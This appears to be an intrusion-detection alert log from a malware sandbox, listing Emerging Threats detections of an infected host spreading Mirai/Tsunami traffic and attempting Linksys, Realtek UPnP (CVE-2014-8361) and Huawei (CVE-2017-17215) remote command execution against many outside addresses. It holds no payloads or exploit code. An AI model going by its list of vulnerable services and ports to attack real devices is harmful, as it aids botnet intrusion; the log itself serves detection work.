Timestamp:	192.168.2.2395.110.232.9756464802027121 05/14/22-02:11:55.012285
SID:	2027121
Source Port:	56464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.8.72.193

Timestamp:	192.168.2.2395.8.72.19347014802027121 05/14/22-02:11:55.040749
SID:	2027121
Source Port:	47014
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.47.97.70

Timestamp:	192.168.2.2395.47.97.7036228802027121 05/14/22-02:12:03.534557
SID:	2027121
Source Port:	36228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.37.243

Timestamp:	192.168.2.23172.65.37.24335642555552027153 05/14/22-02:12:06.228008
SID:	2027153
Source Port:	35642
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.182.120.236

Timestamp:	192.168.2.2395.182.120.23638966802027121 05/14/22-02:11:50.412772
SID:	2027121
Source Port:	38966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.10.0

Timestamp:	192.168.2.23172.65.10.053968555552027153 05/14/22-02:12:11.587321
SID:	2027153
Source Port:	53968
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.112.122

Timestamp:	192.168.2.2395.154.112.12243126802027121 05/14/22-02:12:24.008186
SID:	2027121
Source Port:	43126
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.203.40

Timestamp:	192.168.2.2395.100.203.4046200802027121 05/14/22-02:12:36.296341
SID:	2027121
Source Port:	46200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.99.143.55

Timestamp:	192.168.2.2388.99.143.5535064802027121 05/14/22-02:12:39.835523
SID:	2027121
Source Port:	35064
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.134.255.28

Timestamp:	192.168.2.2395.134.255.2857518802027121 05/14/22-02:11:48.410937
SID:	2027121
Source Port:	57518
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.106.127

Timestamp:	192.168.2.23156.226.106.12749420528692027339 05/14/22-02:12:59.756210
SID:	2027339
Source Port:	49420
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.241.77.219

Timestamp:	192.168.2.23156.241.77.21936828528692027339 05/14/22-02:12:37.410964
SID:	2027339
Source Port:	36828
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.147.125.11

Timestamp:	192.168.2.2388.147.125.1157218802027121 05/14/22-02:12:43.278898
SID:	2027121
Source Port:	57218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.31.91

Timestamp:	192.168.2.2395.159.31.9139228802027121 05/14/22-02:12:57.701159
SID:	2027121
Source Port:	39228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.33.100

Timestamp:	192.168.2.2395.101.33.10038818802027121 05/14/22-02:11:52.573122
SID:	2027121
Source Port:	38818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.154.141

Timestamp:	192.168.2.2395.100.154.14133290802027121 05/14/22-02:11:55.048182
SID:	2027121
Source Port:	33290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.181.216.180

Timestamp:	192.168.2.2395.181.216.18039938802027121 05/14/22-02:12:08.396424
SID:	2027121
Source Port:	39938
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.239.201

Timestamp:	192.168.2.23172.65.239.20157596555552027153 05/14/22-02:12:36.880675
SID:	2027153
Source Port:	57596
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.3.15

Timestamp:	192.168.2.2395.58.3.1548388802027121 05/14/22-02:13:22.563201
SID:	2027121
Source Port:	48388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.255.132

Timestamp:	192.168.2.2395.57.255.13244390802027121 05/14/22-02:12:33.932176
SID:	2027121
Source Port:	44390
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.52.142

Timestamp:	192.168.2.2395.154.52.14257790802027121 05/14/22-02:13:00.782189
SID:	2027121
Source Port:	57790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.95.179

Timestamp:	192.168.2.2395.101.95.17957846802027121 05/14/22-02:12:03.507219
SID:	2027121
Source Port:	57846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.140.153.158

Timestamp:	192.168.2.2395.140.153.15856040802027121 05/14/22-02:12:28.223713
SID:	2027121
Source Port:	56040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.108.141

Timestamp:	192.168.2.23172.65.108.14133886555552027153 05/14/22-02:12:33.795226
SID:	2027153
Source Port:	33886
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.225.158.38

Timestamp:	192.168.2.23156.225.158.3853788528692027339 05/14/22-02:12:20.524009
SID:	2027339
Source Port:	53788
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.250.15.179

Timestamp:	192.168.2.23156.250.15.17939434528692027339 05/14/22-02:12:33.756550
SID:	2027339
Source Port:	39434
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.50.161

Timestamp:	192.168.2.2395.101.50.16159636802027121 05/14/22-02:12:12.544980
SID:	2027121
Source Port:	59636
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.114.199

Timestamp:	192.168.2.2395.217.114.19941138802027121 05/14/22-02:12:33.730021
SID:	2027121
Source Port:	41138
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.21.50.3

Timestamp:	192.168.2.2395.21.50.339374802027121 05/14/22-02:12:04.793956
SID:	2027121
Source Port:	39374
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.99.156

Timestamp:	192.168.2.23172.65.99.15639658555552027153 05/14/22-02:12:07.296438
SID:	2027153
Source Port:	39658
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.65.49.53

Timestamp:	192.168.2.2395.65.49.5341268802027121 05/14/22-02:12:31.453562
SID:	2027121
Source Port:	41268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.161.250

Timestamp:	192.168.2.23172.65.161.25046236555552027153 05/14/22-02:12:11.570256
SID:	2027153
Source Port:	46236
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.183.206.2

Timestamp:	192.168.2.2395.183.206.250534802027121 05/14/22-02:12:12.345070
SID:	2027121
Source Port:	50534
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.29.149

Timestamp:	192.168.2.23172.65.29.14935424555552027153 05/14/22-02:13:03.185493
SID:	2027153
Source Port:	35424
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.56.57.119

Timestamp:	192.168.2.2395.56.57.11935020802027121 05/14/22-02:13:09.123139
SID:	2027121
Source Port:	35020
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.3.127

Timestamp:	192.168.2.23172.65.3.12749930555552027153 05/14/22-02:13:09.596926
SID:	2027153
Source Port:	49930
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.190.177

Timestamp:	192.168.2.2395.101.190.17742846802027121 05/14/22-02:12:12.333017
SID:	2027121
Source Port:	42846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.136.105

Timestamp:	192.168.2.2395.216.136.10545390802027121 05/14/22-02:12:38.435082
SID:	2027121
Source Port:	45390
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.227.170

Timestamp:	192.168.2.2395.100.227.17041112802027121 05/14/22-02:12:12.383299
SID:	2027121
Source Port:	41112
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.30.250.186

Timestamp:	192.168.2.2395.30.250.18660900802027121 05/14/22-02:12:41.134897
SID:	2027121
Source Port:	60900
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.110.219.252

Timestamp:	192.168.2.2395.110.219.25258002802027121 05/14/22-02:12:06.988408
SID:	2027121
Source Port:	58002
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.250.93.92

Timestamp:	192.168.2.23156.250.93.9246958528692027339 05/14/22-02:12:13.854287
SID:	2027339
Source Port:	46958
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.179.138

Timestamp:	192.168.2.23172.65.179.13846560555552027153 05/14/22-02:13:25.217133
SID:	2027153
Source Port:	46560
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.130.158.89

Timestamp:	192.168.2.2395.130.158.8946304802027121 05/14/22-02:11:48.322037
SID:	2027121
Source Port:	46304
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.196.40

Timestamp:	192.168.2.23172.65.196.4033988555552027153 05/14/22-02:12:00.108181
SID:	2027153
Source Port:	33988
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.56.15.149

Timestamp:	192.168.2.2395.56.15.14946206802027121 05/14/22-02:12:33.933501
SID:	2027121
Source Port:	46206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.164.211.137

Timestamp:	192.168.2.2395.164.211.13740294802027121 05/14/22-02:12:23.952380
SID:	2027121
Source Port:	40294
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.59.240.149

Timestamp:	192.168.2.2395.59.240.14948520802027121 05/14/22-02:11:58.029242
SID:	2027121
Source Port:	48520
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.190.99

Timestamp:	192.168.2.2395.179.190.9935494802027121 05/14/22-02:11:48.314156
SID:	2027121
Source Port:	35494
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.183.11.240

Timestamp:	192.168.2.2395.183.11.24036174802027121 05/14/22-02:11:52.658094
SID:	2027121
Source Port:	36174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.24.121

Timestamp:	192.168.2.2395.216.24.12135232802027121 05/14/22-02:12:18.537644
SID:	2027121
Source Port:	35232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.214.98.180

Timestamp:	192.168.2.23197.214.98.18056372372152835222 05/14/22-02:12:31.482188
SID:	2835222
Source Port:	56372
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.130.253.22

Timestamp:	192.168.2.2395.130.253.2236174802027121 05/14/22-02:11:57.640340
SID:	2027121
Source Port:	36174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.96.43

Timestamp:	192.168.2.23172.65.96.4351198555552027153 05/14/22-02:13:43.804838
SID:	2027153
Source Port:	51198
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.250.149.86

Timestamp:	192.168.2.2395.250.149.8654382802027121 05/14/22-02:12:38.401526
SID:	2027121
Source Port:	54382
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.63.121

Timestamp:	192.168.2.23172.65.63.12143308555552027153 05/14/22-02:13:00.154647
SID:	2027153
Source Port:	43308
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.58.159

Timestamp:	192.168.2.2395.217.58.15941126802027121 05/14/22-02:12:01.397400
SID:	2027121
Source Port:	41126
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.6.91.36

Timestamp:	192.168.2.2395.6.91.3641418802027121 05/14/22-02:12:07.016180
SID:	2027121
Source Port:	41418
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.111.197.188

Timestamp:	192.168.2.2395.111.197.18852578802027121 05/14/22-02:12:34.070826
SID:	2027121
Source Port:	52578
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.83.108.149

Timestamp:	192.168.2.2388.83.108.14946180802027121 05/14/22-02:13:39.640695
SID:	2027121
Source Port:	46180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.227.161.24

Timestamp:	192.168.2.2395.227.161.2454070802027121 05/14/22-02:13:29.632794
SID:	2027121
Source Port:	54070
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.255.117.238

Timestamp:	192.168.2.2395.255.117.23858354802027121 05/14/22-02:12:53.425616
SID:	2027121
Source Port:	58354
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.234.37

Timestamp:	192.168.2.2395.179.234.3754506802027121 05/14/22-02:12:07.018103
SID:	2027121
Source Port:	54506
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.9.225.102

Timestamp:	192.168.2.2395.9.225.10248152802027121 05/14/22-02:11:48.334081
SID:	2027121
Source Port:	48152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.164.218.195

Timestamp:	192.168.2.2395.164.218.19550980802027121 05/14/22-02:11:52.750159
SID:	2027121
Source Port:	50980
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.248.242

Timestamp:	192.168.2.23172.65.248.24245400555552027153 05/14/22-02:13:08.573609
SID:	2027153
Source Port:	45400
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.238.139.13

Timestamp:	192.168.2.2395.238.139.1348666802027121 05/14/22-02:12:25.914760
SID:	2027121
Source Port:	48666
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.247.159

Timestamp:	192.168.2.2395.179.247.15952292802027121 05/14/22-02:12:04.767954
SID:	2027121
Source Port:	52292
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.47.232

Timestamp:	192.168.2.23172.65.47.23260828555552027153 05/14/22-02:12:26.254915
SID:	2027153
Source Port:	60828
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.208.78.179

Timestamp:	192.168.2.2388.208.78.17954476802027121 05/14/22-02:13:11.528734
SID:	2027121
Source Port:	54476
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.155.229.234

Timestamp:	192.168.2.2395.155.229.23450038802027121 05/14/22-02:12:47.723727
SID:	2027121
Source Port:	50038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.33.100

Timestamp:	192.168.2.2395.101.33.10038886802027121 05/14/22-02:11:53.949765
SID:	2027121
Source Port:	38886
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.55.214

Timestamp:	192.168.2.2395.159.55.21435902802027121 05/14/22-02:13:17.206694
SID:	2027121
Source Port:	35902
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.163.12.168

Timestamp:	192.168.2.2395.163.12.16845128802027121 05/14/22-02:12:38.483919
SID:	2027121
Source Port:	45128
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.238.47.12

Timestamp:	192.168.2.23156.238.47.1252070528692027339 05/14/22-02:12:00.693831
SID:	2027339
Source Port:	52070
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.80.200.201

Timestamp:	192.168.2.2395.80.200.20139330802027121 05/14/22-02:12:36.296587
SID:	2027121
Source Port:	39330
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.254.110.82

Timestamp:	192.168.2.23156.254.110.8237370528692027339 05/14/22-02:13:45.786874
SID:	2027339
Source Port:	37370
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.210.93

Timestamp:	192.168.2.2395.154.210.9359854802027121 05/14/22-02:11:45.992850
SID:	2027121
Source Port:	59854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.125.88

Timestamp:	192.168.2.2395.100.125.8853800802027121 05/14/22-02:12:25.889391
SID:	2027121
Source Port:	53800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.48.149

Timestamp:	192.168.2.23172.65.48.14949556555552027153 05/14/22-02:12:40.957123
SID:	2027153
Source Port:	49556
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.35.232

Timestamp:	192.168.2.23172.65.35.23239748555552027153 05/14/22-02:12:51.437608
SID:	2027153
Source Port:	39748
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.247.19.198

Timestamp:	192.168.2.23156.247.19.19837608528692027339 05/14/22-02:12:24.973762
SID:	2027339
Source Port:	37608
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.49.58

Timestamp:	192.168.2.2395.154.49.5858606802027121 05/14/22-02:12:28.144267
SID:	2027121
Source Port:	58606
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.223.48.41

Timestamp:	192.168.2.2395.223.48.4155004802027121 05/14/22-02:11:45.963936
SID:	2027121
Source Port:	55004
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.74.111

Timestamp:	192.168.2.23172.65.74.11136330555552027153 05/14/22-02:13:08.554571
SID:	2027153
Source Port:	36330
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.212.150

Timestamp:	192.168.2.2395.217.212.15044942802027121 05/14/22-02:12:06.989043
SID:	2027121
Source Port:	44942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.2.163

Timestamp:	192.168.2.2395.58.2.16337560802027121 05/14/22-02:13:23.571844
SID:	2027121
Source Port:	37560
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.87.89

Timestamp:	192.168.2.23156.226.87.8944194528692027339 05/14/22-02:13:39.931274
SID:	2027339
Source Port:	44194
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.211.210.53

Timestamp:	192.168.2.2395.211.210.5351742802027121 05/14/22-02:12:12.345964
SID:	2027121
Source Port:	51742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.237.97

Timestamp:	192.168.2.2395.217.237.9747216802027121 05/14/22-02:12:33.770644
SID:	2027121
Source Port:	47216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.239.86

Timestamp:	192.168.2.23172.65.239.8641954555552027153 05/14/22-02:12:16.079208
SID:	2027153
Source Port:	41954
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.211.229.207

Timestamp:	192.168.2.2395.211.229.20751322802027121 05/14/22-02:12:31.379545
SID:	2027121
Source Port:	51322
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.154.158

Timestamp:	192.168.2.2395.101.154.15835774802027121 05/14/22-02:12:38.368211
SID:	2027121
Source Port:	35774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.100.76

Timestamp:	192.168.2.2395.154.100.7638420802027121 05/14/22-02:12:13.843893
SID:	2027121
Source Port:	38420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

